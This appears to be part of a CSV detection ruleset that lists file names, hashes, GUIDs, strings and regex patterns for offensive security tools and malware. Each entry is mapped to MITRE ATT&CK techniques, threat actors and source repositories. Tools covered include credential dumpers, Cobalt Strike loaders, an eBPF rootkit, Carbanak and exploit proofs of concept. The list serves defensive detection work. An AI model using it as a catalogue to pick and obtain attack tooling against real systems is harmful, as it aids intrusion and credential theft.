"*AccessTokenImpersonationAccount*",".{0,1000}AccessTokenImpersonationAccount.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","33110"
"*Accounts with extra permissions.txt*",".{0,1000}Accounts\swith\sextra\spermissions\.txt.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","33111"
"*acd65a0c933308d9a867fb3701e39787a386708fbaabd907d41b3decdb481ca2*",".{0,1000}acd65a0c933308d9a867fb3701e39787a386708fbaabd907d41b3decdb481ca2.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","0","#filehash","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","33114"
"*acd7392528b68181416263c966f899f4cd0b6430951ca09900739601c588eb5d*",".{0,1000}acd7392528b68181416263c966f899f4cd0b6430951ca09900739601c588eb5d.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#filehash","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","33115"
"*acda112d8e7cf13a8d91628d58d53b7099fc9ae7ecf8e0b6b1c86fe6a8f0ef2d*",".{0,1000}acda112d8e7cf13a8d91628d58d53b7099fc9ae7ecf8e0b6b1c86fe6a8f0ef2d.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","33117"
"*acda6b715fc3fdeed1f43c73e5467f5824093ac0*",".{0,1000}acda6b715fc3fdeed1f43c73e5467f5824093ac0.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","33118"
"*ACE_Get-KerberosTicketCache.ps1*",".{0,1000}ACE_Get\-KerberosTicketCache\.ps1.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","33119"
"*ACE_Get-KerberosTicketCache.ps1*",".{0,1000}ACE_Get\-KerberosTicketCache\.ps1.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","33120"
"*ACE_Get-KerberosTicketCache.ps1*",".{0,1000}ACE_Get\-KerberosTicketCache\.ps1.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","1","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","33121"
"*ace5f1151a4f4b7df43bfc7e45aa52d00aa4dc1642bbf1aa6f0872ffed1cd684*",".{0,1000}ace5f1151a4f4b7df43bfc7e45aa52d00aa4dc1642bbf1aa6f0872ffed1cd684.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","33123"
"*ace6030f3a6859f95a7c0ce956035e71a105e4daade9631c324e7e548aef77cb*",".{0,1000}ace6030f3a6859f95a7c0ce956035e71a105e4daade9631c324e7e548aef77cb.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","33124"
"*aceb27720115a63b9d47e737fd878a61c52435ea4ec86ba8e58ee744bc85c4f3*",".{0,1000}aceb27720115a63b9d47e737fd878a61c52435ea4ec86ba8e58ee744bc85c4f3.{0,1000}","offensive_tool_keyword","Smbtouch-Scanner","Smbtouch detect whether the target is vulnerable of one of these vulnerabilities: ETERNALBLUE - ETERNALCHAMPION - ETERNALROMANCE - ETERNALSYNERGY","T1210 - T1046 - T1133","TA0007 - TA0043 - TA0008","N/A","APT15 - Turla","Lateral Movement","https://github.com/3gstudent/Smbtouch-Scanner","1","0","#filehash","N/A","10","2","140","66","2021-04-17T01:42:06Z","2017-04-21T01:38:55Z","33126"
"*ACEE9097-0CA8-4520-A6CA-3BF97B7A86DE*",".{0,1000}ACEE9097\-0CA8\-4520\-A6CA\-3BF97B7A86DE.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","33127"
"*AceLdr.*.bin*",".{0,1000}AceLdr\..{0,1000}\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","N/A","10","10","925","164","2024-06-04T16:45:42Z","2022-08-11T00:06:09Z","33128"
"*AceLdr.zip*",".{0,1000}AceLdr\.zip.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","N/A","10","10","925","164","2024-06-04T16:45:42Z","2022-08-11T00:06:09Z","33129"
"*acf7a8a9-3aaf-46c2-8aa8-2d12d7681baf*",".{0,1000}acf7a8a9\-3aaf\-46c2\-8aa8\-2d12d7681baf.{0,1000}","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for Lateral Movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","0","#GUIDproject","N/A","10","7","615","90","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z","33130"
"*acffa7660aefbd032bf1125b81cbd9927ff4edb5e0a8d5b05200cdde90a42714*",".{0,1000}acffa7660aefbd032bf1125b81cbd9927ff4edb5e0a8d5b05200cdde90a42714.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#filehash","N/A","9","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","33131"
"*acheron-master.zip*",".{0,1000}acheron\-master\.zip.{0,1000}","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","N/A","4","326","39","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z","33132"
"*ACLight.ps1*",".{0,1000}ACLight\.ps1.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","33133"
"*ACLight.psd1*",".{0,1000}ACLight\.psd1.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","33134"
"*ACLight.psm1*",".{0,1000}ACLight\.psm1.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","33135"
"*ACLight2.ps1*",".{0,1000}ACLight2\.ps1.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","33136"
"*ACLight2.psd1*",".{0,1000}ACLight2\.psd1.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","33137"
"*ACLight2.psm1*",".{0,1000}ACLight2\.psm1.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","33138"
"*ACLight-master*",".{0,1000}ACLight\-master.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","33139"
"*aclpwn -f * -ft computer -t * -tt domain -d * -dry*",".{0,1000}aclpwn\s\-f\s.{0,1000}\s\-ft\scomputer\s\-t\s.{0,1000}\s\-tt\sdomain\s\-d\s.{0,1000}\s\-dry.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","33140"
"*aclpwn.py*",".{0,1000}aclpwn\.py.{0,1000}","offensive_tool_keyword","Aclpwn","Aclpwn.py is a tool that interacts with BloodHound to identify and exploit ACL based privilege escalation paths. It takes a starting and ending point and will use Neo4j pathfinding algorithms to find the most efficient ACL based privilege escalation path. Aclpwn.py is similar to the PowerShell based Invoke-Aclpwn","T1098 - T1208 - T1550 - T1484 - T1486","TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/fox-it/aclpwn.py","1","0","N/A","N/A","N/A","8","722","108","2021-11-18T03:47:24Z","2018-12-04T18:45:04Z","33141"
"*acltoolkit *",".{0,1000}acltoolkit\s.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","N/A","2","120","12","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z","33143"
"*acltoolkit.git*",".{0,1000}acltoolkit\.git.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","N/A","2","120","12","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z","33144"
"*acltoolkit-ad*",".{0,1000}acltoolkit\-ad.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","N/A","2","120","12","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z","33145"
"*acltoolkit-main*",".{0,1000}acltoolkit\-main.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","N/A","2","120","12","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z","33146"
"*acronis_trueimage_xpc_privesc*",".{0,1000}acronis_trueimage_xpc_privesc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","33148"
"*AcroRd32.exe FUZZ*",".{0,1000}AcroRd32\.exe\sFUZZ.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tool","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","7","1","68","9","2024-09-15T22:43:02Z","2021-09-17T14:40:07Z","33149"
"*aCSHELL/../../../../../../../*",".{0,1000}aCSHELL\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/.{0,1000}","offensive_tool_keyword","POC","CVE-2024-24919","T1005 - T1006 - T1078 - T1110 - T1135 - T1185","TA0001 - TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/LucasKatashi/CVE-2024-24919","1","1","#linux","N/A","10","1","13","5","2024-05-30T17:08:11Z","2024-05-30T16:23:18Z","33150"
"*act as a named pipe server to be connected by other clients*",".{0,1000}act\sas\sa\snamed\spipe\sserver\sto\sbe\sconnected\sby\sother\sclients.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","33151"
"*Action: Locating SCCM Management Servers*",".{0,1000}Action\:\sLocating\sSCCM\sManagement\sServers.{0,1000}","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tool","https://github.com/nettitude/MalSCCM","1","0","N/A","N/A","10","3","246","37","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z","33152"
"*Action: Locating SCCM Servers in Registry*",".{0,1000}Action\:\sLocating\sSCCM\sServers\sin\sRegistry.{0,1000}","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tool","https://github.com/nettitude/MalSCCM","1","0","N/A","N/A","10","3","246","37","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z","33153"
"*action=SchTaskCOMHijack *",".{0,1000}action\=SchTaskCOMHijack\s.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","33154"
"*Activate all of rootkit's hooks*",".{0,1000}Activate\sall\sof\srootkit\'s\shooks.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","33165"
"*activate_command_control_shell(*",".{0,1000}activate_command_control_shell\(.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","33167"
"*activate_command_control_shell_encrypted(*",".{0,1000}activate_command_control_shell_encrypted\(.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","33168"
"*Activated COMMAND & CONTROL encrypted shell*",".{0,1000}Activated\sCOMMAND\s\&\sCONTROL\sencrypted\sshell.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","33169"
"*Activated COMMAND & CONTROL shell*",".{0,1000}Activated\sCOMMAND\s\&\sCONTROL\sshell.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","33170"
"*Activating COMMAND & CONTROL with MULTI-PACKET backdoor trigger*",".{0,1000}Activating\sCOMMAND\s\&\sCONTROL\swith\sMULTI\-PACKET\sbackdoor\strigger.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","33171"
"*activedirectory/pwns.go*",".{0,1000}activedirectory\/pwns\.go.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","1","N/A","AD Enumeration","10","10","1908","184","2025-03-25T13:01:45Z","2020-10-07T10:07:22Z","33172"
"*ActiveMQ-RCE -i *",".{0,1000}ActiveMQ\-RCE\s\-i\s.{0,1000}","offensive_tool_keyword","POC","Achieving a Reverse Shell Exploit for Apache ActiveMQ (CVE_2023-46604)","T1190 - T1059 - T1071 - T1105 - T1041","TA0001 - TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","Exploitation tool","https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ","1","0","N/A","N/A","9","2","114","39","2024-01-20T16:59:23Z","2023-11-03T22:06:09Z","33173"
"*ActiveMQ-RCE.exe*",".{0,1000}ActiveMQ\-RCE\.exe.{0,1000}","offensive_tool_keyword","POC","Achieving a Reverse Shell Exploit for Apache ActiveMQ (CVE_2023-46604)","T1190 - T1059 - T1071 - T1105 - T1041","TA0001 - TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","Exploitation tool","https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ","1","1","N/A","N/A","9","2","114","39","2024-01-20T16:59:23Z","2023-11-03T22:06:09Z","33174"
"*ActiveOfflineKeylogger*",".{0,1000}ActiveOfflineKeylogger.{0,1000}","offensive_tool_keyword","Fynloski Backdoor","Backdoor Fynloski also knownn as Darkcoment - allows attackers to control the infected system and install other malware remotely","T1105 - T1071 - T1219 - T1059 - T1203 - T1056 - T1113","TA0011 - TA0009 - TA0010 - TA0008 - TA0002 - TA0005","N/A","N/A","Malware","https://www.hybrid-analysis.com/sample/43b40a12a966313f889c338e07239a42af67a69745507e45c4e899bcfa913b81/5a3d55d27ca3e1257f7044f3","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A","33175"
"*ActiveOnlineKeylogger*",".{0,1000}ActiveOnlineKeylogger.{0,1000}","offensive_tool_keyword","Fynloski Backdoor","Backdoor Fynloski also knownn as Darkcoment - allows attackers to control the infected system and install other malware remotely","T1105 - T1071 - T1219 - T1059 - T1203 - T1056 - T1113","TA0011 - TA0009 - TA0010 - TA0008 - TA0002 - TA0005","N/A","N/A","Malware","https://www.hybrid-analysis.com/sample/43b40a12a966313f889c338e07239a42af67a69745507e45c4e899bcfa913b81/5a3d55d27ca3e1257f7044f3","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A","33176"
"*ActiveOnlineKeyStrokes*",".{0,1000}ActiveOnlineKeyStrokes.{0,1000}","offensive_tool_keyword","Fynloski Backdoor","Backdoor Fynloski also knownn as Darkcoment - allows attackers to control the infected system and install other malware remotely","T1105 - T1071 - T1219 - T1059 - T1203 - T1056 - T1113","TA0011 - TA0009 - TA0010 - TA0008 - TA0002 - TA0005","N/A","N/A","Malware","https://www.hybrid-analysis.com/sample/43b40a12a966313f889c338e07239a42af67a69745507e45c4e899bcfa913b81/5a3d55d27ca3e1257f7044f3","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A","33177"
